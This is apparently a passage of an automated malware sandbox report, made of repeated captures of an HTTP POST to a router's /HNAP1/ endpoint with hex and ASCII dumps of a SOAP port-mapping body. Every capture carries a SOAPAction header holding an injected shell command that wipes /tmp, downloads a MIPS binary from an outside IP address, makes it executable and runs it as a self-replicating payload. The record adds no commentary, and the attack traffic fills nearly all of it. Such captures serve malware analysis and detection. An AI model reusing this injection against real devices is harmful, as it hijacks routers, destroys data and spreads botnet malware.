32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 